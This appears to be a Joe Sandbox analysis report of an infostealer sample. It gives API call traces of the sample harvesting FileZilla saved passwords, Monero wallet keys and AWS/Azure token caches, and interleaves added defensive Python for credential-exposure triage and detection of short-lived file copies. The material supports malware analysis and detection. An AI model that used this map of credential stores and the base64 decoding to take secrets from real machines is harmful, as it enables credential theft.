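                                 The record above is the FileZilla credential module. The function reads \AppData\Roaming\FileZilla\recentservers.xml through the CreateFileA/GetFileSizeEx/ReadFile subcall at 00B799C0, StrStrA-scans the buffer for <Host>, <Port>, <User> and <Pass encoding="base64">, and lstrcat's the results into a five-line "browser: FileZilla / profile: null / url: / login: / password:" record. FileZilla only base64-encodes saved passwords unless a master password has been configured (in which case the <Pass> element carries a different encoding attribute), so to anything that can read the file it is a plaintext credential store. The script below is an added example, not code from this report or from the analysed sample: it parses the same file (a constructed sample is embedded so it runs offline, and %APPDATA% is assumed to resolve to the profile's AppData\Roaming), reproduces the sample's record layout with the decoded password replaced by its length, and tells the responder which saved servers need their credentials rotated.

```python
"""Triage helper for FileZilla's recentservers.xml.

Added example; not code from the Joe Sandbox report or the analysed sample.
Lists the saved servers a stolen copy of the file exposes without printing
any decoded password.
"""
import base64
import os
import sys
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Constructed sample in FileZilla's recentservers.xml layout. Hosts, users and
# the base64 value are invented for this example, not taken from the report.
SAMPLE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <User>deploy</User>
      <Pass encoding="base64">U3VwZXJTZWNyZXQh</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <User>backup</User>
    </Server>
  </RecentServers>
</FileZilla3>
"""


@dataclass
class ExposedAccount:
    host: str
    port: str
    user: str
    password_stored: bool
    password_len: int  # decoded length, 0 when no password is saved

    def as_record(self) -> str:
        """Same five-line layout the sample builds, with the secret redacted
        to its length so the output is safe to paste into a ticket."""
        secret = (f"<{self.password_len} chars, base64 only>"
                  if self.password_stored else "<none stored>")
        return "\n".join([
            "browser: FileZilla",
            "profile: null",
            f"url: {self.host}:{self.port}",
            f"login: {self.user}",
            f"password: {secret}",
        ])


def parse_recentservers(data: bytes) -> List[ExposedAccount]:
    """One ExposedAccount per <Server>. Only encoding="base64" is decoded,
    which is the only encoding the sample's trace searches for; any other
    encoding is reported as stored but left alone."""
    accounts = []
    for server in ET.fromstring(data).iter("Server"):
        pass_el = server.find("Pass")
        stored, length = False, 0
        if pass_el is not None and pass_el.text:
            stored = True
            if pass_el.get("encoding") == "base64":
                length = len(base64.b64decode(pass_el.text, validate=True))
        accounts.append(ExposedAccount(
            host=server.findtext("Host", default=""),
            port=server.findtext("Port", default=""),
            user=server.findtext("User", default=""),
            password_stored=stored,
            password_len=length,
        ))
    return accounts


def default_path() -> str:
    """Path the sample reads; %APPDATA% is AppData\\Roaming on a default profile."""
    return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "recentservers.xml")


def main(argv: List[str]) -> int:
    path = argv[1] if len(argv) > 1 else default_path()
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        print(f"{path} not readable; using the constructed sample instead\n")
        data = SAMPLE_XML
    accounts = parse_recentservers(data)
    for acct in accounts:
        print(acct.as_record(), end="\n\n")
    exposed = sum(a.password_stored for a in accounts)
    print(f"{exposed} of {len(accounts)} saved servers carry a recoverable password; rotate those first.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

                                 Run it on the affected user's file (python triage_filezilla.py "%APPDATA%\FileZilla\recentservers.xml") or with no argument to see the constructed sample. The same file is also written by FileZilla's sitemanager.xml for saved sites, which uses the identical <Server> element, so the parser applies to that file unchanged.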
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B759F8
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B75A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B75B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0093E2C0,00000000,?,0093A098,00000000,?,00B91A1C), ref: 00B75E71
                                • lstrlen.KERNEL32(00000000), ref: 00B75E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00B75E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B75E9A
                                • lstrlen.KERNEL32(00000000), ref: 00B75EAF
                                • lstrlen.KERNEL32(00000000), ref: 00B75ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B75EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00B75F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B75F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B75F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00B75FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00B75FBD
                                • HttpOpenRequestA.WININET(00000000,0093E210,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B75BF8
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • InternetCloseHandle.WININET(00000000), ref: 00B75FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 4a5c3e79459cef4a8d2bbff980e596593d9d0a9dd4d7d854369eac7a40590001
                                • Instruction ID: 8d047c34eab721c4d68e5a0f7199c35b8a796216d0b8fba1dbb1c8682e3e9e06
                                • Opcode Fuzzy Hash: 4a5c3e79459cef4a8d2bbff980e596593d9d0a9dd4d7d854369eac7a40590001
                                • Instruction Fuzzy Hash: 1C12DF71820118AAEB15FBA4DC95FEE73B8BF14700F5041EAF106721A1EF746A4ACF65
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B7D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B7D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D208
                                • lstrcat.KERNEL32(?,00B91478), ref: 00B7D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D22A
                                • lstrcat.KERNEL32(?,00B9147C), ref: 00B7D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D24C
                                • lstrcat.KERNEL32(?,00B91480), ref: 00B7D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D26E
                                • lstrcat.KERNEL32(?,00B91484), ref: 00B7D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D290
                                • lstrcat.KERNEL32(?,00B91488), ref: 00B7D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D2B2
                                • lstrcat.KERNEL32(?,00B9148C), ref: 00B7D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7D2D4
                                • lstrcat.KERNEL32(?,00B91490), ref: 00B7D2E3
                                  • Part of subcall function 00B8A820: lstrlen.KERNEL32(00B74F05,?,?,00B74F05,00B90DDE), ref: 00B8A82B
                                  • Part of subcall function 00B8A820: lstrcpy.KERNEL32(00B90DDE,00000000), ref: 00B8A885
                                • lstrlen.KERNEL32(?), ref: 00B7D32A
                                • lstrlen.KERNEL32(?), ref: 00B7D339
                                  • Part of subcall function 00B8AA70: StrCmpCA.SHLWAPI(009388C0,00B7A7A7,?,00B7A7A7,009388C0), ref: 00B8AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 3f96bc94210359e4bfd7836b80b7ce5e74da7ae62551814491dff1c03bd52643
                                • Instruction ID: b1749876ed92e290b1d9f0de36eab08696de527d759d941e90786baf04b86613
                                • Opcode Fuzzy Hash: 3f96bc94210359e4bfd7836b80b7ce5e74da7ae62551814491dff1c03bd52643
                                • Instruction Fuzzy Hash: 72E10F71910209EBDB04FBA4DD96EEE73B8BF14301F504199F106B61A1DE39AE05DB72
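                                 The record above shows CopyFileA (with bFailIfExists set to 1), a roughly 100 MB RtlAllocateHeap, GetSystemTime in a subcall, a run of lstrcat calls that assemble a text record, and finally DeleteFileA. That is the copy, parse and delete sequence stealers use on files another process holds open: copy the store to a scratch path, read the copy, remove it. Neither the source nor the destination path is recoverable from this trace (both CopyFileA arguments are shown as 00000000), so detection has to key on the behaviour rather than on a path. The Python below is an added example, not part of this report or of the sample: it runs over constructed events in a Sysmon-like shape (event ID 11 for FileCreate, 23 for FileDelete; the PIDs, timestamps and paths are invented) and flags processes that create and delete the same file within seconds more than once, which is the on-disk footprint this sequence leaves when it is repeated per store.

```python
"""Short-lived file copy detector.

Added example; not code from the Joe Sandbox report or the analysed sample.
Pairs FileCreate with the following FileDelete of the same path by the same
process and flags processes that do this repeatedly within a short window.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed events as (pid, sysmon_event_id, iso_timestamp, path).
# 11 = FileCreate, 23 = FileDelete. All values are invented for this example.
SAMPLE_EVENTS = [
    (4120, 11, "2024-10-01T10:00:01.100", r"C:\Users\u\AppData\Local\Temp\tmp8F3A.tmp"),
    (4120, 23, "2024-10-01T10:00:01.450", r"C:\Users\u\AppData\Local\Temp\tmp8F3A.tmp"),
    (4120, 11, "2024-10-01T10:00:02.010", r"C:\Users\u\AppData\Local\Temp\tmp8F3B.tmp"),
    (4120, 23, "2024-10-01T10:00:02.300", r"C:\Users\u\AppData\Local\Temp\tmp8F3B.tmp"),
    # benign: an installer writes a log and removes it a minute later
    (5300, 11, "2024-10-01T10:00:05.000", r"C:\Users\u\AppData\Local\Temp\setup.log"),
    (5300, 23, "2024-10-01T10:01:10.000", r"C:\Users\u\AppData\Local\Temp\setup.log"),
    # benign: one quick temp file from an unrelated process
    (6100, 11, "2024-10-01T10:00:07.000", r"C:\Users\u\AppData\Local\Temp\~DF1.tmp"),
    (6100, 23, "2024-10-01T10:00:07.200", r"C:\Users\u\AppData\Local\Temp\~DF1.tmp"),
]

FILE_CREATE = 11
FILE_DELETE = 23


@dataclass
class ShortLivedFile:
    pid: int
    path: str
    lifetime: timedelta


def find_short_lived_files(events, max_lifetime: timedelta = timedelta(seconds=5)) -> List[ShortLivedFile]:
    """Match each FileCreate with the next FileDelete of the same (pid, path)
    and keep the pairs whose lifetime is at most max_lifetime."""
    pending: Dict[Tuple[int, str], datetime] = {}
    hits: List[ShortLivedFile] = []
    for pid, eid, ts, path in sorted(events, key=lambda e: e[2]):
        when = datetime.fromisoformat(ts)
        key = (pid, path.lower())  # NTFS paths are case-insensitive
        if eid == FILE_CREATE:
            pending[key] = when
        elif eid == FILE_DELETE and key in pending:
            lifetime = when - pending.pop(key)
            if lifetime <= max_lifetime:
                hits.append(ShortLivedFile(pid, path, lifetime))
    return hits


def flag_processes(hits: List[ShortLivedFile], min_count: int = 2) -> Dict[int, int]:
    """A stealer walks several stores, so alert only on PIDs that produce
    min_count or more short-lived copies; a single quick temp file is normal."""
    counts: Dict[int, int] = defaultdict(int)
    for hit in hits:
        counts[hit.pid] += 1
    return {pid: n for pid, n in counts.items() if n >= min_count}


if __name__ == "__main__":
    found = find_short_lived_files(SAMPLE_EVENTS)
    for hit in found:
        print(f"pid {hit.pid}: {hit.path} lived {hit.lifetime.total_seconds():.2f}s")
    for pid, n in flag_processes(found).items():
        print(f"ALERT pid {pid}: {n} short-lived file copies")
```

                                 Tune max_lifetime and min_count to the environment; the interesting signal is the repetition from one process, not any single copy. Sysmon must be configured to log FileDelete events (ID 23 or 26) for the deletes to be visible at all, and an EDR that records CopyFileA as a FileCreate of the destination will show the same pattern.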
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0093CEF8,00000000,?,00B9144C,00000000,?,?), ref: 00B7CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B7CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00B7CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B7CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B7CAD9
                                • StrStrA.SHLWAPI(?,0093CDF0,00B90B52), ref: 00B7CAF7
                                • StrStrA.SHLWAPI(00000000,0093CE08), ref: 00B7CB1E
                                • StrStrA.SHLWAPI(?,0093D538,00000000,?,00B91458,00000000,?,00000000,00000000,?,00938970,00000000,?,00B91454,00000000,?), ref: 00B7CCA2
                                • StrStrA.SHLWAPI(00000000,0093D698), ref: 00B7CCB9
                                  • Part of subcall function 00B7C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B7C871
                                  • Part of subcall function 00B7C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B7C87C
                                • StrStrA.SHLWAPI(?,0093D698,00000000,?,00B9145C,00000000,?,00000000,009388E0), ref: 00B7CD5A
                                • StrStrA.SHLWAPI(00000000,00938B40), ref: 00B7CD71
                                  • Part of subcall function 00B7C820: lstrcat.KERNEL32(?,00B90B46), ref: 00B7C943
                                  • Part of subcall function 00B7C820: lstrcat.KERNEL32(?,00B90B47), ref: 00B7C957
                                  • Part of subcall function 00B7C820: lstrcat.KERNEL32(?,00B90B4E), ref: 00B7C978
                                • lstrlen.KERNEL32(00000000), ref: 00B7CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00B7CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 3448e310df684da9d0314b0d93e8c9ee073bc7b7c74236d551412382c98ce824
                                • Instruction ID: 59bfc08ddc65bdae0d8f757abf1e86c7131376f12f82fb64dfe0ee7aaf87c0bd
                                • Opcode Fuzzy Hash: 3448e310df684da9d0314b0d93e8c9ee073bc7b7c74236d551412382c98ce824
                                • Instruction Fuzzy Hash: 1DE1B071910108EBEB15FBA4DC95FEEB7B8AF14300F50419AF506B61A1DF346A4ACB72
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • RegOpenKeyExA.ADVAPI32(00000000,0093A9C0,00000000,00020019,00000000,00B905B6), ref: 00B883A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B88426
                                • wsprintfA.USER32 ref: 00B88459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B8847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B8848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B88499
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 76bf7847f6c2133a2fc0f9ec08ab9575c0ea6f4e60e2c1e0a82208a055bdb04c
                                • Instruction ID: b8e4557c8d23bf88733591e61731e2ad8beea4e7665e7fd6c48fcc3c01498ef5
                                • Opcode Fuzzy Hash: 76bf7847f6c2133a2fc0f9ec08ab9575c0ea6f4e60e2c1e0a82208a055bdb04c
                                • Instruction Fuzzy Hash: 8881E971910218EBEB24EB54CC95FEAB7B8FF48700F4082D9E109A6190DF756B85CFA5
                                APIs
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00B84DCD
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B8492C
                                  • Part of subcall function 00B84910: FindFirstFileA.KERNEL32(?,?), ref: 00B84943
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00B84E59
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FDC), ref: 00B84971
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FE0), ref: 00B84987
                                  • Part of subcall function 00B84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B84B7D
                                  • Part of subcall function 00B84910: FindClose.KERNEL32(000000FF), ref: 00B84B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B84EE5
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B849B0
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B908D2), ref: 00B849C5
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B849E2
                                  • Part of subcall function 00B84910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B84A1E
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,0093E220), ref: 00B84A4A
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,00B90FF8), ref: 00B84A5C
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,?), ref: 00B84A70
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,00B90FFC), ref: 00B84A82
                                  • Part of subcall function 00B84910: lstrcat.KERNEL32(?,?), ref: 00B84A96
                                  • Part of subcall function 00B84910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B84AAC
                                  • Part of subcall function 00B84910: DeleteFileA.KERNEL32(?), ref: 00B84B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 18a0c18e9c0af9b25facd675e23abd6144033150cefe7b460d6a23b42ad6ae1e
                                • Instruction ID: efbb89f8228d5a743ce8cefa6ce146855d17129f9aa2dd586333714ddfc404ae
                                • Opcode Fuzzy Hash: 18a0c18e9c0af9b25facd675e23abd6144033150cefe7b460d6a23b42ad6ae1e
                                • Instruction Fuzzy Hash: DF41817A940304A7DB14F774EC47FDD32B8AB24700F4049E4B189A61D1EEB597C9DBA2
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B8906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
